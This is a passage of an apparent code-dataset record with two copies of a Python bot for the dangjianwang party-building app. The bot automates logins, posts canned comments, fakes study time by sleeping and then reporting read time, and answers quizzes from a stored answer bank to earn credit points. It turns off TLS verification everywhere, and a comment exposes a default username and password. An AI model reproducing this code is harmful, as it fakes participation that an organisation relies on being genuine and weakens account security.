print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 
0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, 
urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = 
None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 
'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n 
'民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in 
aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n\n def getAnswerInfo(self):\n \"\"\"\n 获得答题的结果与正确率\n :return:\n \"\"\"\n data = {'token': self.token, 'appid': self.appid, 'page_size': '20',\n 'page_index': 'page_index'}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n\n\n<mask token>\n",
"step-5": "import json\r\nimport os, django\r\n\r\n\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"dangjianyun.settings\")# project_name 项目名称\r\ndjango.setup()\r\nfrom dangjiansite.djfuncs import *\r\nimport os\r\nimport datetime\r\nimport requests\r\nimport time\r\nimport urllib3\r\nimport base64\r\nimport csv\r\nimport random\r\nfrom bs4 import BeautifulSoup\r\nfrom dangjiansite.models import *\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Runner():\r\n\r\n # def __init__(self, appid='TJZHDJ01', username='024549', password='Aa1234'):\r\n def __init__(self, appid='TJZHDJ01', username='', password=''):\r\n urllib3.disable_warnings()#屏蔽ssl告警\r\n self.currentTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n self.username = username\r\n self.password = password\r\n self.thumbedFilePath = './lib/'.format(username)\r\n self.logFilePath = './log/'.format(username)\r\n self.errFilePath = './err/'.format(username)\r\n # self.thumbedFileList = self.getThumbFromFile()\r\n self.thumbedFileList = []\r\n self.debug = True\r\n self.session = requests.session()\r\n self.appid = appid#应该是本设备安装app的id 等换个设备试一下就知道了\r\n self.headers ={\r\n 'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)',\r\n 'header_version': '80',\r\n 'system': 'android',\r\n 'Connection': 'Keep-Alive',\r\n 'Host': 'mapi.dangjianwang.com',\r\n }\r\n self.token = self.getToken()\r\n time.sleep(0.1)\r\n self.thumbPageList = self.getPages(urls=[\r\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\r\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\r\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'\r\n ])\r\n self.thumbPages = [i[1] for i in self.thumbPageList]\r\n time.sleep(0.1)\r\n self.helpPageList = self.getPages(urls=['https://mapi.dangjianwang.com/v3_1/Help/List', ])\r\n self.helpPages = [i[1] for i in self.helpPageList]\r\n self.helpResults = {}\r\n time.sleep(0.1)\r\n self.studyPageList = 
self.getPagesII(urls=['https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\r\n self.studyPages = [i[1] for i in self.studyPageList]\r\n time.sleep(0.1)\r\n self.studyRsults = {}\r\n self.thumbedPages = []\r\n self.thumbResults = {}\r\n self.helpedPages = []\r\n self.multiThumbed = []#考虑最后要写入文件之中\r\n self.viewsResults = []\r\n self.examC19Info = []\r\n self.examlist = []\r\n self.qaList = []\r\n\r\n def getCurrentTime(self):\r\n return datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n\r\n\r\n def writeErr2File(self, err):\r\n path = self.logFilePath\r\n fullPath = '{}{}err.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write('{}:{}\\n'.format(self.currentTime, err))\r\n print('err已经写入{}'.format(fullPath))\r\n\r\n def writeLog2File(self, log):\r\n path = self.logFilePath\r\n fullPath = '{}{}logs.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write('{}:{}\\n'.format(self.currentTime, log))\r\n print('log已经写入{}'.format(fullPath))\r\n\r\n def writeThumb2File(self, id):\r\n path = self.thumbedFilePath\r\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write(',{}'.format(id))\r\n print('点赞记录已经写入{}'.format(fullPath))\r\n\r\n def getThumbFromFile(self):\r\n '''\r\n\r\n :return: 文件中id组成的列表\r\n '''\r\n path = self.thumbedFilePath\r\n inFileList = []\r\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\r\n if not os.path.exists(fullPath):\r\n return fullPath\r\n with open(fullPath, 'r') as f:\r\n inFileList.extend(list(set(f.readlines()[0].split(','))))\r\n # print('getThumbFormFile', inFileList)\r\n with open(fullPath, 'w') as f1:\r\n f1.write(','.join(sorted(inFileList)))\r\n return inFileList\r\n\r\n def getExcuteTimes(self):\r\n '''\r\n 返回点赞等自动执行的次数的字典\r\n :return:\r\n '''\r\n excuteTimes = {}\r\n\r\n 
credInfo = self.getCredItinfo()\r\n print(credInfo)\r\n currentScore = credInfo[0]\r\n\r\n # 点赞次数\r\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\r\n thumbExcuteTimes = 10 - int(thumbScore)\r\n excuteTimes.update({'thumb': thumbExcuteTimes})\r\n # 帮助次数\r\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\r\n helpExctuteTimes = 2 - int(helpScore)\r\n excuteTimes.update({'help': helpExctuteTimes})\r\n # 党员视角发布次数\r\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\r\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\r\n excuteTimes.update({'view': viewExcuteTimes})\r\n # 在线知识竞答次数\r\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\r\n examExcuteTimes = int((4 - int(examScore)) / 2)\r\n excuteTimes.update({'exam': examExcuteTimes})\r\n # 学习次数\r\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]['在线阅读学习资料'].split('/')[0])\r\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]['学习资料写体会'].split('/')[0])\r\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\r\n excuteTimes.update({'study': examExcuteTimes})\r\n\r\n return excuteTimes\r\n\r\n def getToken(self):\r\n '''\r\n 获得一个连接的token\r\n 每个连接都需要使用到\r\n :return:\r\n '''\r\n data = {\r\n 'appid': self.appid,\r\n 'username': self.username,\r\n 'password': self.password,\r\n }\r\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\r\n\r\n r = self.session.post(url=longinurl, data=data, verify=False)\r\n rjson = r.json()\r\n # print(type(rjson))\r\n # print(rjson)\r\n\r\n if rjson['code'] == '200':\r\n return rjson['token']\r\n else:\r\n print('token 获得失败')\r\n return None\r\n\r\n def getRJson(self, url):\r\n data={\r\n 'token': self.token,\r\n 'appid': self.appid\r\n }\r\n\r\n return self.session.post(url=url, data=data, verify=False).json()\r\n\r\n def getUserInfo(self):\r\n '''\r\n 获得一大串用户的信息,暂时没用\r\n :return:\r\n '''\r\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\r\n return self.getRJson(url=infoUrl)\r\n\r\n def getCredItinfoToday(self):\r\n '''\r\n 
获得人员当前的得分等级参数\r\n :return:\r\n '''\r\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\r\n info = self.getRJson(url=creditInfourl)\r\n fullScore = info['data']['full']\r\n gainScore = info['data']['gain']\r\n currentLevel = info['data']['level']\r\n username = info['data']['name']\r\n ret = {\r\n 'fullScore': fullScore,\r\n 'gainScore': gainScore,\r\n 'currentLevel': currentLevel,\r\n 'username': username,\r\n }\r\n return ret\r\n\r\n\r\n def getCredItinfo(self):\r\n '''\r\n 获得用户的今日积分状态\r\n 可用来判断是否需要再继续流程\r\n 数据如下\r\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\r\n :return:(haved_credit, credit_detail)\r\n '''\r\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\r\n haved_credit = 0\r\n credit_detail = {}\r\n\r\n info = self.getRJson(url=creditInfourl)\r\n for k, v in info.items():\r\n if k == 'data':\r\n for k2, v2 in v.items():\r\n if k2 == 'haved_credit':\r\n haved_credit = v2\r\n if k2 == 'credit_detail':\r\n for i in v2:\r\n credit_detail.update({i['title']: i['score']})\r\n\r\n return (haved_credit, credit_detail)\r\n\r\n def getPages(self, urls):\r\n pages = []\r\n for url in urls:\r\n data = self.getRJson(url=url)\r\n for k, v in data.items():\r\n if k == 'data':\r\n for i in v:\r\n # pages.append({'pageId': i['id'], 'pageTitle': i['title']})\r\n # pages.append(i['id'])\r\n pages.append((i['title'], i['id']))\r\n\r\n return pages\r\n\r\n def getPagesII(self, urls):\r\n def getRJson(url):\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'type_id': '791',\r\n 'page_index': '1',\r\n }\r\n\r\n return self.session.post(url=url, data=data, verify=False).json()\r\n pages = []\r\n for url in urls:\r\n data = getRJson(url=url)\r\n for k, v in data.items():\r\n # print(k, v)\r\n if k == 'data':\r\n for i in v:\r\n # pages.append({'pageId': i['id'], 'pageTitle': i['title']})\r\n # 
pages.append(i['id'])\r\n pages.append((i['name'], i['id']))\r\n\r\n return pages\r\n\r\n def doThumb(self, id):\r\n '''\r\n 点赞函数,操作与id对应的页面\r\n 每次记录对应的信息到文件\r\n :return:\r\n '''\r\n contents = [\r\n '关注',\r\n '关注!',\r\n '关注!!']\r\n data = {\r\n 'id': id,\r\n 'comment': random.choice(contents),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n print(rjson)\r\n if rjson['code'] == '1003':\r\n self.token = self.getToken()\r\n elif rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.thumbedPages.append(id)\r\n # print(self.thumbPageList)\r\n # print(len(self.thumbPageList), len(list(set(self.thumbPageList))))\r\n\r\n for i in list(set(self.thumbPageList)):\r\n if id == i[1]:\r\n temp = {'title': i[0]}\r\n self.thumbResults.update(temp)\r\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data['comment'])\r\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.getCurrentTime(), i[0], data['comment'])\r\n write2File(self, './results/', 'result.txt', log)\r\n thumbInfo = {'title': i[0], 'reply': data['comment']}\r\n\r\n self.thumbPages.remove(id)\r\n self.writeThumb2File(id=id)\r\n\r\n return (detail, thumbInfo)\r\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\r\n print('因评论过快,等待一段时间')\r\n time.sleep(20)\r\n else:\r\n print('rjson', rjson)\r\n # self.multiThumbed.append(id)\r\n self.thumbedPages.remove(id)#不成功的时候也要去掉不然总会选到\r\n self.writeThumb2File(id=id)\r\n log = '点赞:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n time.sleep(10)\r\n\r\n\r\n def doHelp(self, id, callback=None):\r\n '''\r\n 互助功能\r\n :param id:\r\n :return:\r\n '''\r\n detail = ''\r\n helpInfo = None\r\n log = ''\r\n content = [\r\n '把党的政治建设摆在首位!',\r\n '不忘初心,牢记使命!',\r\n '发展史第一要务,人才是第一资源,创新是第一动力。',\r\n '要把党的领导贯彻到依法治国全过程和各方面',\r\n '毫不动摇坚持中国共产党领导',]\r\n data = {\r\n 'id': id,\r\n 'content': 
random.choice(content),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n print(data)\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n\r\n\r\n\r\n if rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.helpedPages.append(id)\r\n self.helpPages.remove(id)\r\n #记录成功的到result\r\n for i in self.helpPageList:\r\n if id == i[1]:\r\n curTime = self.getCurrentTime()\r\n # print('('*88)\r\n # print(curTime)\r\n self.helpResults.update({'title': id[0]})\r\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson['comment'])\r\n write2File(self, './results/', 'result.txt', log)\r\n # #写入数据库\r\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[0], rjson['comment'].strip())\r\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n log = '帮助:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n return (detail, log, helpInfo)\r\n\r\n def doView(self):\r\n '''\r\n 党员视角发布功能\r\n\r\n :return:\r\n '''\r\n\r\n content = [\r\n '全面的小康,覆盖的人口要全面,是惠及全体人民的小康。',\r\n '不忘初心,牢记使命,坚持终身学习!']\r\n data = {\r\n 'content': random.choice(content),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n if rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.viewsResults.append(1)\r\n # self.viewsResults.append(id)\r\n else:\r\n pass\r\n\r\n log = '党员视角:{}'.format(rjson)\r\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson['data']['content'])\r\n publicContent = rjson['data']['content']\r\n # print(detail)\r\n # self.writeLog2File(log)\r\n # print('党员视角'*12)\r\n # print(id)\r\n # print(log)\r\n # print('党员视角' * 12)\r\n return (detail, publicContent)\r\n\r\n def doStudy(self, mid):\r\n '''\r\n 
前三个post函数的响应的三个请求\r\n get用来获得填写的内容\r\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\r\n :param mid:\r\n :return:\r\n '''\r\n interval = 60 * 5 + 5\r\n def post1():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post1:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n def post2():\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post2:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n def post3():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post3:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n\r\n def get1():\r\n url = 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'.format(self.token, mid)\r\n rjson = self.session.get(url=url)\r\n text = rjson.content\r\n soup = BeautifulSoup(text, 'html.parser')\r\n retContents = []\r\n for div in soup.find_all('p'):\r\n p = div.text.strip()\r\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\r\n return random.choice(retContents)\r\n\r\n def recordFeeling(content=None):\r\n if not content:\r\n content = '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,' \\\r\n '是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。' \\\r\n '邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'content': content\r\n }\r\n\r\n 
